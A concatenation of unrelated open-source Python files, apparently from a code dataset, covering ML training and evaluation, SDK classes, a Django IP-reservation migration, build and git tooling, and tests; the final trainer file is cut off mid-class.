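# length n//4, which guarantees arr[i] == arr[i + n//4] for at least one i.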
__________________________________________________________________________________________________
sample 80 ms submission
class Solution:
def findSpecialInteger(self, arr: List[int]) -> int:
size = int((len(arr)) / 4)
loose = max(1, size)
for index in range(0, len(arr), loose):
candidate = arr[index]
left = bisect.bisect_left(arr, candidate, max(0, index - loose), min(len(arr), index + loose))
right = bisect.bisect_right(arr, candidate, max(0, index - loose), min(len(arr), index + loose))
if right - left > size:
return arr[index]
assert(False)
__________________________________________________________________________________________________
|
tests/test_all.py | avidale/compress-fasttext | 111 | 12798336 | import os
import gensim
import pytest
import compress_fasttext
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import LogisticRegression
from compress_fasttext.feature_extraction import FastTextTransformer
BIG_MODEL_FILE = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data/test_data/ft_leipzig_ru_mini.bin')
BASE_MODEL_URL = 'https://github.com/avidale/compress-fasttext/releases/download/'
def cosine_sim(x, y):
return sum(x * y) / (sum(x**2) * sum(y**2)) ** 0.5
@pytest.mark.parametrize('method, params', [
(compress_fasttext.quantize_ft, dict(qdim=32)),
(compress_fasttext.prune_ft_freq, dict(pq=False, new_ngrams_size=10_000, new_vocab_size=10_000)),
(compress_fasttext.prune_ft_freq, dict(pq=True, new_ngrams_size=10_000, new_vocab_size=10_000, qdim=16)),
(compress_fasttext.prune_ft, dict(new_ngrams_size=10_000, new_vocab_size=10_000)),
(compress_fasttext.svd_ft, dict(n_components=32)),
])
def test_prune_save_load(method, params):
word1 = 'синий'
word2 = 'белый'
big_ft = gensim.models.fasttext.FastTextKeyedVectors.load(BIG_MODEL_FILE)
vec0 = big_ft[word1]
small_model = method(big_ft, **params)
assert cosine_sim(vec0, small_model[word1]) > 0.75
out1 = small_model.most_similar(word1)
assert word2 in {w for w, sim in out1}
small_model.save('tmp_small.bin')
small_model2 = compress_fasttext.models.CompressedFastTextKeyedVectors.load('tmp_small.bin')
assert cosine_sim(vec0, small_model2[word1]) > 0.75
out2 = small_model2.most_similar(word1)
assert word2 in {w for w, sim in out2}
assert out1[0][1] == pytest.approx(out2[0][1])
@pytest.mark.parametrize('word1, word2, model_name', [
('белый', 'черный', 'gensim-4-draft/geowac_tokens_sg_300_5_2020-100K-20K-100.bin'),
('white', 'black', 'gensim-4-draft/ft_cc.en.300_freqprune_50K_5K_pq_100.bin'),
('white', 'black', 'v0.0.4/cc.en.300.compressed.bin'),
])
def test_loading_existing_models(word1, word2, model_name):
ft = compress_fasttext.models.CompressedFastTextKeyedVectors.load(BASE_MODEL_URL + model_name)
out = ft.most_similar(word1)
assert word2 in {w for w, sim in out}
def test_sklearn_wrapper():
small_model = compress_fasttext.models.CompressedFastTextKeyedVectors.load(
'https://github.com/avidale/compress-fasttext/releases/download/v0.0.4/cc.en.300.compressed.bin'
)
classifier = make_pipeline(
FastTextTransformer(model=small_model),
LogisticRegression()
).fit(
['banana', 'soup', 'burger', 'car', 'tree', 'city'],
[1, 1, 1, 0, 0, 0]
)
assert (classifier.predict(['jet', 'train', 'cake', 'apple']) == [0, 0, 1, 1]).all()
|
tools/authors.py | roboterclubaachen/xpcc | 161 | 12798367 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017, <NAME>
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
import subprocess, locale
from collections import defaultdict
import argparse
author_handles = {
"<NAME>": "AndreGilerson",
"<NAME>": "Sh4rK",
"<NAME>": None,
"<NAME>": "cajt",
"<NAME>": "chrism333",
"<NAME>": None,
"<NAME>": "chris-durand",
"<NAME>": "daniel-k",
"<NAME>": "dhebbeker",
"<NAME>": "dergraaf",
"<NAME>": "georgi-g",
"<NAME>": "RzwoDzwo",
"<NAME>": None,
"<NAME>": "ekiwi",
"<NAME>": "lmoesch",
"<NAME>": "Maju-Ketchup",
"<NAME>": "Scabber",
"<NAME>": "thundernail",
"<NAME>": "mhthies",
"<NAME>": "genbattle",
"<NAME>": None,
"<NAME>": "salkinium",
"<NAME>": "rleh",
"<NAME>": "strongly-typed",
"<NAME>": "7Kronos",
"<NAME>": "TheTh0r",
"<NAME>": "tomchy",
"<NAME>": "acristoffers",
}
def get_author_log(since = None, until = None, handles = True, count = False):
sl_command = "git shortlog -sn"
if since is not None:
sl_command += " --since=\"{}\"".format(since)
if until is not None:
sl_command += " --until=\"{}\"".format(until)
# get the shortlog summary
output = subprocess.Popen(sl_command, shell=True, stdout=subprocess.PIPE)\
.stdout.read().decode(locale.getpreferredencoding())
# parse the shortlog
shortlog = defaultdict(int)
for line in output.splitlines():
commits, author = line.split("\t")
shortlog[author] += int(commits)
# convert to list of tuples for sorting
commit_tuples = [(c, a) for a, c in shortlog.items()]
if count:
# sort by number of commits, then alphabetically by author
commit_tuples.sort(key=lambda a: (-a[0], a[1]))
else:
# sort by name
commit_tuples.sort(key=lambda a: a[1])
output = []
for (commits, author) in commit_tuples:
out = author
if handles and author in author_handles and author_handles[author] is not None:
out += u" (@{})".format(author_handles[author])
if count:
out = u"{:4} {}".format(commits, out)
output.append(out)
return output
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Author statistics of xpcc.")
parser.add_argument("--handles", dest="with_handles", action="store_true",
help="adds the GitHub handle to the author if known")
parser.add_argument("--count", dest="with_count", action="store_true",
help="adds and sorts authors by commit count")
parser.add_argument("--shoutout", dest="with_shoutout", action="store_true",
help="annotates first time contributers")
parser.add_argument("--since", dest="since",
help="evaluates the git history from this date until present")
args = parser.parse_args()
since_date = args.since if args.since else None
log_authors = get_author_log(since=since_date, handles=args.with_handles, count=args.with_count)
new_authors = []
if args.with_shoutout and since_date:
previous_authors = get_author_log(until=since_date, handles=False, count=False)
new_authors = get_author_log(since=since_date, handles=False, count=False)
new_authors = [a for a in new_authors if a not in previous_authors]
authors = []
for author in log_authors:
if any(a in author for a in new_authors):
author += u" 🎉🎊"
authors.append(author)
print("\n".join(authors))
|
tests/test_provider_hashicorp_hashicups.py | mjuenema/python-terrascript | 507 | 12798374
# tests/test_provider_hashicorp_hashicups.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:18:02 UTC)
def test_provider_import():
import terrascript.provider.hashicorp.hashicups
def test_resource_import():
from terrascript.resource.hashicorp.hashicups import hashicups_order
def test_datasource_import():
from terrascript.data.hashicorp.hashicups import hashicups_coffees
from terrascript.data.hashicorp.hashicups import hashicups_ingredients
from terrascript.data.hashicorp.hashicups import hashicups_order
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.hashicups
#
# t = terrascript.provider.hashicorp.hashicups.hashicups()
# s = str(t)
#
# assert 'https://github.com/hashicorp/terraform-provider-hashicups' in s
# assert '0.3.1' in s
|
src/kpdetector/concatenate_results.py | gathierry/FashionAI-KeyPointsDetectionOfApparel | 174 | 12798389 | import pandas as pd
from src.config import Config
config = Config()
dfs = []
for cloth in ['blouse', 'skirt', 'outwear', 'dress', 'trousers']:
df = pd.read_csv(config.proj_path + 'kp_predictions/' + cloth + '.csv')
dfs.append(df)
res_df = pd.concat(dfs)
res_df.to_csv(config.proj_path +'kp_predictions/result.csv', index=False) |
vkwave/bots/core/dispatching/handler/__init__.py | Stunnerr/vkwave | 222 | 12798447 | from .base import BaseHandler, DefaultHandler # noqa: F401
from .cast import caster as callback_caster # noqa: F401
|
alipay/aop/api/response/AlipayOpenMiniPlanOperateBatchqueryResponse.py | antopen/alipay-sdk-python-all | 213 | 12798467 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.PaymentSuccessPagePlanInfo import PaymentSuccessPagePlanInfo
class AlipayOpenMiniPlanOperateBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenMiniPlanOperateBatchqueryResponse, self).__init__()
self._page_data = None
self._page_num = None
self._page_size = None
self._total_number = None
@property
def page_data(self):
return self._page_data
@page_data.setter
def page_data(self, value):
if isinstance(value, list):
self._page_data = list()
for i in value:
if isinstance(i, PaymentSuccessPagePlanInfo):
self._page_data.append(i)
else:
self._page_data.append(PaymentSuccessPagePlanInfo.from_alipay_dict(i))
@property
def page_num(self):
return self._page_num
@page_num.setter
def page_num(self, value):
self._page_num = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def total_number(self):
return self._total_number
@total_number.setter
def total_number(self, value):
self._total_number = value
def parse_response_content(self, response_content):
response = super(AlipayOpenMiniPlanOperateBatchqueryResponse, self).parse_response_content(response_content)
if 'page_data' in response:
self.page_data = response['page_data']
if 'page_num' in response:
self.page_num = response['page_num']
if 'page_size' in response:
self.page_size = response['page_size']
if 'total_number' in response:
self.total_number = response['total_number']
|
src/exabgp/util/od.py | pierky/exabgp | 1,560 | 12798482
# encoding: utf-8
"""
od.py
Created by <NAME> on 2009-09-06.
Copyright (c) 2009-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
def od(value):
def spaced(value):
even = None
for v in value:
if even is False:
yield ' '
yield '%02X' % v
even = not even
return ''.join(spaced(value))
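# Illustrative usage (not part of the original module):
# od(bytes([1, 2, 3, 4])) returns '0102 0304' -- uppercase hex grouped two
# bytes per block, with blocks separated by spaces.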
|
server/utils/workflow.py | Samsong1991/django-vue-admin | 425 | 12798485
from django.conf import settings
import time
import requests
import hashlib
import traceback
import json
class WorkFlowAPiRequest(object):
def __init__(self,token=settings.WORKFLOW_TOKEN, appname=settings.WORKFLOW_APP, username='admin', workflowurl=settings.WORKFLOW_URL):
self.token = token
self.appname = appname
self.username = username
self.workflowurl = workflowurl
def getrequestheader(self):
timestamp = str(time.time())[:10]
ori_str = timestamp + self.token
signature = hashlib.md5(ori_str.encode(encoding='utf-8')).hexdigest()
headers = dict(signature=signature, timestamp=timestamp, appname=self.appname, username=self.username)
return headers
def getdata(self,parameters=dict(),method='get',url='/api/v1.0/workflows/',timeout=300,data=dict()):
if method not in ['get','post','put','delete','patch']:
return False,'method must be one of get post put delete or patch'
if not isinstance(parameters,dict):
return False,'Parameters must be dict'
headers = self.getrequestheader()
try:
r = getattr(requests,method)('{0}{1}'.format(self.workflowurl,url), headers=headers, params=parameters,timeout=timeout,data=json.dumps(data))
result = r.json()
return True,result
except:
return False,traceback.format_exc()
# ins = WorkFlowAPiRequest()
# print (ins.getdata(parameters=dict(username='admin', per_page=20, name=''),method='get',url='/api/v1.0/workflows')) |
patchlion/0000/DrawHeadImage.py | saurabh896/python-1 | 3,976 | 12798558
# -*- coding: utf-8 -*-
__author__ = 'PatchLion'
from PIL import Image, ImageDraw,ImageFont
def drawNumberOnIcon(imgpath, number):
img = Image.open(imgpath)
if (None == img):
        print('Failed to open the image')
return
img = img.resize((160, 160))
print(imgpath, "->", img.format, img.size, img.mode)
draw = ImageDraw.Draw(img)
img_size = img.size
font = ImageFont.truetype("Varela-Regular.otf", size=int(img_size[1]/4))
text_size = font.getsize(str(number))
draw.text((img_size[0]-text_size[0], 0), str(number), font=font, fill=(255, 0, 0))
img.save('icon_withnumber.jpg')
    print('Image generated successfully')
drawNumberOnIcon("icon.jpg", 21) |
finetuning/v1/evaluate.py | wietsedv/bertje | 104 | 12798564
import argparse
import os
from collections import Counter
from sklearn.metrics import confusion_matrix, classification_report
def read_labels(filename):
labels = []
with open(filename) as f:
for line in f:
line = line.strip()
if len(line) == 0:
continue
_, label = line.split('\t')
labels.append(label)
return labels
def compare_labels(true_labels, pred_labels):
true_set = set(true_labels)
pred_set = set(pred_labels)
print('\n▶ Label usage:')
print(' ~ Used in both: {}'.format(true_set | pred_set))
print(' ~ Extra in true: {}'.format(true_set - pred_set))
print(' ~ Extra in pred: {}'.format(pred_set - true_set))
print('\n▶ Raw counts:')
true_counts = Counter(true_labels)
pred_counts = Counter(pred_labels)
sorted_labels = sorted(true_counts, key=true_counts.get, reverse=True) + sorted(pred_set - true_set)
print('\tTrue\tPred\tDiff')
for label in sorted_labels:
diff = pred_counts[label] - true_counts[label]
direction = '+' if diff > 0 else '-' if diff < 0 else ' '
if diff < 0:
diff = -diff
print('{}\t{}\t{}\t{}{:4}'.format(label, true_counts[label], pred_counts[label], direction, diff))
print('\n▶ Confusion matrix:')
sorted_labels = sorted(true_set | pred_set)
padded_labels = [lab + ' ' * (4 - len(lab)) if len(lab) < 8 else lab for lab in sorted_labels]
cm = confusion_matrix(true_labels, pred_labels, labels=sorted_labels)
print(' \tpredicted:')
print(' \t' + '\t'.join(padded_labels))
for i in range(len(cm)):
prefix = 'true: ' if i == 0 else ' ' * 6
prefix += padded_labels[i]
print(prefix + '\t' + '\t'.join([str(n) for n in cm[i]]))
print('\n▶ Classification report:')
print(classification_report(true_labels, pred_labels, digits=3))
print('\n▶ Classification report w/o O label:')
print(classification_report(true_labels, pred_labels, labels=list(true_set - {'O'}), digits=3))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--path", default=None, type=str, required=True, help="Base path")
parser.add_argument("--name", default=None, type=str, required=True, help="File name [train,dev,test]")
args = parser.parse_args()
true_path = os.path.join(args.path, args.name + '.true.tsv')
pred_path = os.path.join(args.path, args.name + '.pred.tsv')
true_labels = read_labels(true_path)
print('▶ Read true labels from {}'.format(true_path))
pred_labels = read_labels(pred_path)
print('▶ Read pred labels from {}'.format(pred_path))
if len(true_labels) != len(pred_labels):
print('True and pred file do not have the same amount of labels ({} and {})'.format(
len(true_labels), len(pred_labels)))
exit(-1)
print('\nFull label comparison:')
compare_labels(true_labels, pred_labels)
if set([lab[0] for lab in true_labels]) == {'B', 'I', 'O'}:
true_label_cats = [lab if lab == 'O' else lab[2:] for lab in true_labels]
pred_label_cats = [lab if lab == 'O' else lab[2:] for lab in pred_labels]
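        # Illustrative: BIO tags such as 'B-PER' and 'I-PER' both collapse to
        # 'PER' here, while the plain 'O' label is kept as-is.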
print('\nBIO category comparison:')
compare_labels(true_label_cats, pred_label_cats)
if 'O' in true_labels:
true_label_binary = ['O' if lab == 'O' else 'X' for lab in true_labels]
pred_label_binary = ['O' if lab == 'O' else 'X' for lab in pred_labels]
print('\nBinary comparison:')
compare_labels(true_label_binary, pred_label_binary)
if __name__ == '__main__':
main()
|
build-tools/scripts/update_gpu_list.py | daniel-falk/nnabla-ext-cuda | 103 | 12798591
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib.request as request
from html.parser import HTMLParser
import re
from mako.template import Template
import os
from gpu_info import incompatible_arcs, gpu_compute_capability_to_arc
basedir = os.path.dirname(os.path.abspath(__file__))
r = request.urlopen('https://developer.nvidia.com/cuda-gpus')
class GetGpuListFromNvidiaSite(HTMLParser):
def __init__(self):
super().__init__()
self.td = False
self.last_value = None
self.last_data = ''
self.gpu_data = {}
def handle_starttag(self, tag, attrs):
if tag == 'td':
self.td = True
def handle_endtag(self, tag):
if tag == 'td':
if self.td:
m = re.match(r'((\d+)\.(\d+))', self.last_data.strip())
if m:
cap = m.group(1)
cap_major = int(m.group(2))
cap_minor = int(m.group(3))
arch = gpu_compute_capability_to_arc.get(cap_major)
if arch is None:
arch = gpu_compute_capability_to_arc.get(
(cap_major, cap_minor))
if arch is None:
print(f'Error: unknown capability [{cap}]')
arch = ''
name = self.last_value.lower().replace(
'nvidia ', '').replace('tesla ', '') # remove prefix
self.gpu_data[name] = (arch, cap)
self.last_value = self.last_data.strip()
self.last_data = ''
self.td = False
def handle_data(self, data):
if self.td:
self.last_data += data
parser = GetGpuListFromNvidiaSite()
parser.feed(r.read().decode())
gpus_info = parser.gpu_data
incompatible_gpus = {}
for k in incompatible_arcs:
if not incompatible_gpus.get(k):
incompatible_gpus[k] = []
iarc = incompatible_arcs[k]
for gpu_name in gpus_info.keys():
if gpus_info[gpu_name][0] in iarc:
incompatible_gpus[k].append(gpu_name)
fname = os.path.join(basedir, 'skel', 'incompatibale_gpu_list.py.tmpl')
tmpl = Template(filename=fname)
lines = tmpl.render(args=incompatible_gpus)
with open("./python/src/nnabla_ext/cuda/incompatible_gpu_list.py", 'w') as f:
for l in lines:
f.write(l)
|
src/ralph/networks/migrations/0008_auto_20160808_0719.py | DoNnMyTh/ralph | 1,668 | 12798606
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import ipaddress
from itertools import chain
from django.db import migrations, models
IPADDRESS_STATUS_RESERVED = 2
def _reserve_margin_addresses(network, bottom_count, top_count, IPAddress):
ips = []
ips_query = IPAddress.objects.filter(
models.Q(
number__gte=network.min_ip + 1,
number__lte=network.min_ip + bottom_count + 1
) |
models.Q(
number__gte=network.max_ip - top_count,
number__lte=network.max_ip
)
)
existing_ips = set(ips_query.values_list('number', flat=True))
to_create = set(chain.from_iterable([
range(int(network.min_ip + 1), int(network.min_ip + bottom_count + 1)), # noqa
range(int(network.max_ip - top_count), int(network.max_ip))
]))
to_create = to_create - existing_ips
for ip_as_int in to_create:
ips.append(IPAddress(
address=str(ipaddress.ip_address(ip_as_int)),
number=ip_as_int,
network=network,
status=IPADDRESS_STATUS_RESERVED
))
print('Creating {} ips for {}'.format(len(ips), network))
IPAddress.objects.bulk_create(ips)
ips_query.update(status=IPADDRESS_STATUS_RESERVED)
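# Illustrative example (made-up network): for 10.0.0.0/24 with bottom_count=10
# and top_count=2, the addresses 10.0.0.1-10.0.0.10 and 10.0.0.253-10.0.0.254
# are created if missing and marked reserved; the network address (min_ip) and
# the broadcast address (max_ip) stay outside the range() bounds above.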
def create_reserved_ips(apps, schema_editor):
IPAddress = apps.get_model('networks', 'IPAddress')
Network = apps.get_model('networks', 'Network')
for network in Network.objects.all():
_reserve_margin_addresses(
network,
network.reserved_from_beginning,
network.reserved_from_end,
IPAddress
)
def remove_reserved_ips(apps, schema_editor):
IPAddress = apps.get_model('networks', 'IPAddress')
ips = IPAddress.objects.filter(
models.Q(ethernet__isnull=True) | (
models.Q(ethernet__base_object__isnull=True) &
models.Q(ethernet__mac__isnull=False)
),
status=IPADDRESS_STATUS_RESERVED,
gateway_network__isnull=True,
)
print('Removing {} reserved IPs'.format(ips.count()))
ips.delete()
class Migration(migrations.Migration):
dependencies = [
('networks', '0007_auto_20160804_1409'),
]
operations = [
migrations.AddField(
model_name='network',
name='reserved_from_beginning',
field=models.PositiveIntegerField(help_text='Number of addresses to be omitted in DHCP automatic assignmentcounted from the first IP in range (excluding network address)', default=10),
),
migrations.AddField(
model_name='network',
name='reserved_from_end',
field=models.PositiveIntegerField(help_text='Number of addresses to be omitted in DHCP automatic assignmentcounted from the last IP in range (excluding broadcast address)', default=0),
),
migrations.RunPython(
remove_reserved_ips,
reverse_code=create_reserved_ips
),
]
|
PWGPP/FieldParam/fitsol.py | maroozm/AliPhysics | 114 | 12798686 | #!/usr/bin/env python
debug = True # enable trace
def trace(x):
global debug
if debug: print(x)
trace("loading...")
from itertools import combinations, combinations_with_replacement
from glob import glob
from math import *
import operator
from functools import reduce  # reduce is only a builtin under Python 2
from os.path import basename
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import sklearn.linear_model
import sklearn.feature_selection
import datetime
def prec_from_pathname(path):
if '2k' in path: return 0.002
elif '5k' in path: return 0.005
else: raise AssertionError('Unknown field strengh: %s' % path)
# ['x', 'y', 'z', 'xx', 'xy', 'xz', 'yy', ...]
def combinatrial_vars(vars_str='xyz', length=3):
term_list = []
for l in range(length):
term_list.extend([''.join(v) for v in combinations_with_replacement(list(vars_str), 1 + l)])
return term_list
# product :: a#* => [a] -> a
def product(xs):
return reduce(operator.mul, xs, 1) # foldl in Haskell
# (XYZ, "xx") -> XX
def term(dataframe, vars_str):
return product(map(lambda x: dataframe[x], list(vars_str)))
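# e.g. term(df, 'xzz') evaluates df['x'] * df['z'] * df['z'] (illustrative).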
# (f(X), Y) -> (max deviation, max%, avg dev, avg%)
def deviation_stat(fX, Y, prec=0.005):
dev = np.abs(fX - Y)
(max_dev, avg_dev) = (dev.max(axis=0), dev.mean(axis=0))
(max_pct, avg_pct) = (max_dev / prec * 100, avg_dev / prec * 100)
return (max_dev, max_pct, avg_dev, avg_pct)
# IO Df
def load_samples(path, cylindrical_axis=True, absolute_axis=True, genvars=[]):
sample_cols = ['x', 'y', 'z', 'Bx', 'By', 'Bz']
df = pd.read_csv(path, sep=' ', names=sample_cols)
if cylindrical_axis:
df['r'] = np.sqrt(df.x**2 + df.y**2)
df['p'] = np.arctan2(df.y, df.x)
df['Bt'] = np.sqrt(df.Bx**2 + df.By**2)
df['Bpsi'] = np.arctan2(df.By, df.Bx) - np.arctan2(df.y, df.x)
df['Br'] = df.Bt * np.cos(df.Bpsi)
df['Bp'] = df.Bt * np.sin(df.Bpsi)
if absolute_axis:
df['X'] = np.abs(df.x)
df['Y'] = np.abs(df.y)
df['Z'] = np.abs(df.z)
for var in genvars:
df[var] = term(df, var)
return df
def choose(vars, df1, df2):
X1 = df1.loc[:, vars].as_matrix()
X2 = df2.loc[:, vars].as_matrix()
return (X1, X2)
# IO ()
def run_analysis_for_all_fields():
sample_set = glob("dat_z22/*2k*.sample.dat")
test_set = glob("dat_z22/*2k*.test.dat")
#print(sample_set, test_set)
assert(len(sample_set) == len(test_set) and len(sample_set) > 0)
result = pd.DataFrame()
for i, sample_file in enumerate(sample_set):
trace("run_analysis('%s', '%s')" % (sample_file, test_set[i]))
df = run_analysis(sample_file, test_set[i])
result = result.append(df, ignore_index=True)
write_header(result)
def run_analysis(sample_file = 'dat_z22/tpc2k-z0-q2.sample.dat',
test_file = 'dat_z22/tpc2k-z0-q2.test.dat'):
global precision, df, test, lr, la, xvars_full, xvars, yvars, X, Y, Xtest, Ytest, ana_result
precision = prec_from_pathname(sample_file)
assert(precision == prec_from_pathname(test_file))
xvars_full = combinatrial_vars('xyz', 3)[3:] # variables except x, y, z upto 3 dims
trace("reading training samples... " + sample_file)
df = load_samples(sample_file, genvars=xvars_full)
trace("reading test samples..." + test_file)
test = load_samples(test_file, genvars=xvars_full)
trace("linear regression fit...")
lr = sklearn.linear_model.LinearRegression()
#ri = sklearn.linear_model.RidgeCV()
#la = sklearn.linear_model.LassoCV()
fs = sklearn.feature_selection.RFE(lr, 1, verbose=0)
#xvars = ['x','y','z','xx','yy','zz','xy','yz','xz','xzz','yzz']
#xvars = ["xx", "yy", "zz", 'x', 'y', 'z', 'xzz', 'yzz']
#xvars = ['xxxr', 'xrrX', 'zzrX', 'p', 'xyrr', 'xzzr', 'xrrY', 'xzrX', 'xxxz', 'xzzr']
#xvars=['x', 'xzz', 'xyz', 'yz', 'yy', 'zz', 'xy', 'xx', 'z', 'y', 'xz', 'yzz']
yvars = ['Bx', 'By', 'Bz']
#yvars = ['Bz']
(Y, Ytest) = choose(yvars, df, test)
#(Y, Ytest) = (df['Bz'], test['Bz'])
xvars = combinatrial_vars('xyz', 3) # use all terms upto 3rd power
(X, Xtest) = choose(xvars, df, test)
for y in yvars:
fs.fit(X, df[y])
res = pd.DataFrame({ "term": xvars, "rank": fs.ranking_ })
trace(y)
trace(res.sort_values(by = "rank"))
#xvars=list(res.sort_values(by="rank")[:26]['term'])
lr.fit(X, Y)
trace(', '.join(yvars) + " = 1 + " + ' + '.join(xvars))
test_dev = deviation_stat(lr.predict(Xtest), Ytest, prec=precision)
#for i in range(len(yvars)):
# arr = [lr.intercept_[i]] + lr.coef_[i]
# arr = [ str(x) for x in arr ]
# print(yvars[i] + " = { " + ', '.join(arr) + " }")
# print("deviation stat [test]: max %.2e (%.1f%%) avg %.2e (%.1f%%)" %
# ( test_dev[0][i], test_dev[1][i], test_dev[2][i], test_dev[3][i] ))
(sample_score, test_score) = (lr.score(X, Y), lr.score(Xtest, Ytest))
trace("linear regression R^2 [train data]: %.8f" % sample_score)
trace("linear regression R^2 [test data] : %.8f" % test_score)
return pd.DataFrame(
{ "xvars": [xvars],
"yvars": [yvars],
"max_dev": [test_dev[0]],
"max%": [test_dev[1]],
"avg_dev": [test_dev[2]],
"avg%": [test_dev[3]],
"sample_score": [sample_score],
"score": [test_score],
"coeffs": [lr.coef_],
"intercept": [lr.intercept_],
"sample_file": [sample_file],
"test_file": [test_file],
"precision": [precision],
"volume_id": [volume_id_from_path(sample_file)]
})
def volume_id_from_path(path):
return basename(path)\
.replace('.sample.dat', '')\
.replace('-', '_')
def get_location_by_volume_id(id):
if 'its' in id: r_bin = 0
if 'tpc' in id: r_bin = 1
if 'tof' in id: r_bin = 2
if 'tofext' in id: r_bin = 3
if 'cal' in id: r_bin = 4
z_bin = int(id.split('_')[1][1:]) # "tofext2k_z0_q4" -> 0
if 'q1' in id: quadrant = 0
if 'q2' in id: quadrant = 1
if 'q3' in id: quadrant = 2
if 'q4' in id: quadrant = 3
return r_bin, z_bin, quadrant
def write_header(result):
#result.to_csv("magfield_params.csv")
#result.to_html("magfield_params.html")
print("# This file was generated from sysid.py at " + str(datetime.datetime.today()))
print("# " + ', '.join(result.iloc[0].yvars) + " = 1 + " + ' + '.join(result.iloc[0].xvars))
print("# barrel r: 0 < its < 80 < tpc < 250 < tof < 400 < tofext < 423 < cal < 500")
print("# barrel z: -550 < z < 550")
print("# phi: 0 < q1 < 0.5pi < q2 < pi < q3 < 1.5pi < q4 < 2pi")
print("# header: Rbin Zbin Quadrant Nval_per_compoment(=20)")
print("# data: Nval_per_compoment x floats")
#print("# R^2: coefficient of determination in multiple linear regression. [0,1]")
print("")
for index, row in result.iterrows():
#print("// ** %s - R^2 %s" % (row.volume_id, row.score))
print("#" + row.volume_id)
r_bin, z_bin, quadrant = get_location_by_volume_id(row.volume_id)
print("%s %s %s 20" % (r_bin, z_bin, quadrant))
for i, yvar in enumerate(row.yvars):
name = row.volume_id #+ '_' + yvar.lower()
print("# precision: tgt %.2e max %.2e (%.1f%%) avg %.2e (%.1f%%)" %
(row['precision'], row['max_dev'][i], row['max%'][i], row['avg_dev'][i], row['avg%'][i]))
coef = [row['intercept'][i]] + list(row['coeffs'][i])
arr = [ "%.5e" % x for x in coef ]
body = ' '.join(arr)
#decl = "const double[] %s = { %s };\n" % (name, body)
#print(decl)
print(body)
print("")
#write_header(run_analysis())
run_analysis_for_all_fields()
#for i in range(10):
# for xvars in combinations(xvars_full, i+1):
#(X, Xtest) = choose(xvars, df, test)
#lr.fit(X, Y)
#ri.fit(X, Y)
#la.fit(X, Y)
#fs.fit(X, Y)
#print xvars
#(sample_score, test_score) = (lr.score(X, Y), lr.score(Xtest, Ytest))
#print("linear R^2[sample] %.8f" % sample_score)
#print("linear R^2[test] %.8f" % test_score)
#(sample_score2, test_score2) = (la.score(X, Y), la.score(Xtest, Ytest))
#print("lasso R^2[sample] %.8f" % sample_score2)
#print("lasso R^2[test] %.8f" % test_score2)
#print(la.coef_)
#for i in range(len(yvars)):
# print(yvars[i])
# print(pd.DataFrame({"Name": xvars, "Params": lr.coef_[i]}).sort_values(by='Params'))
# print("+ %e" % lr.intercept_[i])
#sample_dev = deviation_stat(lr.predict(X), Y, prec=precision)
#test_dev = deviation_stat(lr.predict(Xtest), Ytest, prec=precision)
#test_dev2 = deviation_stat(la.predict(Xtest), Ytest, prec=precision)
#print("[sample] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % sample_dev)
#print("[test] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % test_dev )
#print("lasso [test] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % test_dev2 )
|
utils/trainer.py | niqbal996/ViewAL | 126 | 12798717 | import os
import torch
import constants
from utils.misc import get_learning_rate
from utils.summary import TensorboardSummary
from utils.loss import SegmentationLosses
from utils.calculate_weights import calculate_weights_labels
from torch.utils.data import DataLoader
import numpy as np
from utils.metrics import Evaluator
from tqdm import tqdm
import random
class Trainer:
def __init__(self, args, model, train_set, val_set, test_set, class_weights, saver):
self.args = args
self.saver = saver
self.saver.save_experiment_config()
self.train_dataloader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.workers)
self.val_dataloader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers)
self.test_dataloader = DataLoader(test_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers)
self.train_summary = TensorboardSummary(os.path.join(self.saver.experiment_dir, "train"))
self.train_writer = self.train_summary.create_summary()
self.val_summary = TensorboardSummary(os.path.join(self.saver.experiment_dir, "validation"))
self.val_writer = self.val_summary.create_summary()
self.model = model
self.dataset_size = {'train': len(train_set), 'val': len(val_set), 'test': len(test_set)}
train_params = [{'params': model.get_1x_lr_params(), 'lr': args.lr},
{'params': model.get_10x_lr_params(), 'lr': args.lr * 10}]
if args.use_balanced_weights:
weight = torch.from_numpy(class_weights.astype(np.float32))
else:
weight = None
if args.optimizer == 'SGD':
print('Using SGD')
self.optimizer = torch.optim.SGD(train_params, momentum=args.momentum, weight_decay=args.weight_decay, nesterov=args.nesterov)
elif args.optimizer == 'Adam':
print('Using Adam')
self.optimizer = torch.optim.Adam(train_params, weight_decay=args.weight_decay)
else:
raise NotImplementedError
self.lr_scheduler = None
if args.use_lr_scheduler:
if args.lr_scheduler == 'step':
print('Using step lr scheduler')
self.lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[int(x) for x in args.step_size.split(",")], gamma=0.1)
